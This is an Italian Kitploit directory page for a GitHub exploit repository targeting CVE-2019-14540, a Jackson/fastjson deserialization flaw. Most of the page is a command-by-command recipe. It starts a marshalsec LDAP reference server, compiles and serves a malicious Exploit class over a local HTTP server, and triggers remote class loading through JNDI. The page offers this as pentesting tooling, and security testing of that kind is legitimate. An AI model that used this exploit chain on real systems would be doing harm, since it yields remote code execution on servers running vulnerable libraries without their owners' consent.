Skip to content
KitploitKITPLOIT
StrumentiBlog
Invia
StrumentiBlog
Invia

Strumenti di Hacking, PenTest e Cybersecurity per il tuo Arsenale di Sicurezza!

Kitploit è una directory di strumenti di hacking, cybersecurity e pentesting. Scopri gli ultimi aggiornamenti dei progetti per trovare vulnerabilità, analizzare sistemi, automatizzare i test e rafforzare la tua sicurezza.

··Feed·Contatto·Privacy·© 2026 Kitploit

Directory degli strumenti

Categorie

Vedi tutte le categorie
Loading categories
cve-2019-14540-exploit — CVE-2019-14540 Exploit | Kitploit
Strumenti/GitHubGitHub/leadroyal/cve-2019-14540-exploit
Analisi Dinamica (Sandboxing)Generazione di PayloadAnalisi delle VulnerabilitàExploitSfruttamento di Applicazioni Web
GitHubleadroyal/cve-2019-14540-exploit

cve-2019-14540-exploit

CVE-2019-14540 Exploit

Vedi Repository
21957 anni faRevisionato da Kitploit

Più Popolari

Vedi tutti →

Scopri gli strumenti più utilizzati dalla nostra community.

Esplora tutti gli strumenti

Sfoglia la nostra collezione di strumenti

Vedi tutti gli strumenti →
Condividi

CVE-2019-14540 Exploit

http://www.leadroyal.cn/?p=939

Limitazioni ambientali: poiché questa demo utilizza il metodo di sfruttamento LDAP di JNDI, è necessario utilizzare una versione di JDK più vecchia (anteriore alla 8u191).

1. Usa marshalsec per creare un servizio LDAP sulla porta locale 1389, che punti al servizio HTTP sulla porta locale 8000

root@kitploit:~
git clone https://github.com/mbechler/marshalsec.git
mvn package -DskipTests
java -cp target/marshalsec-0.0.3-SNAPSHOT-all.jar marshalsec.jndi.LDAPRefServer "http://127.0.0.1:8000/#Exploit" 1389

2. Compila in remote_codebase il codice per il caricamento remoto

root@kitploit:~
cd remote_codebase
javac Exploit.java

3. Avvia in remote_codebase un servizio HTTP locale sulla porta 8000

Scarica lo strumento
root@kitploit:~
cd remote_codebase
python -m SimpleHTTPServer

4. Esegui Main.java per attivare la vulnerabilità tramite la deserializzazione con jackson e fastjson

demo.png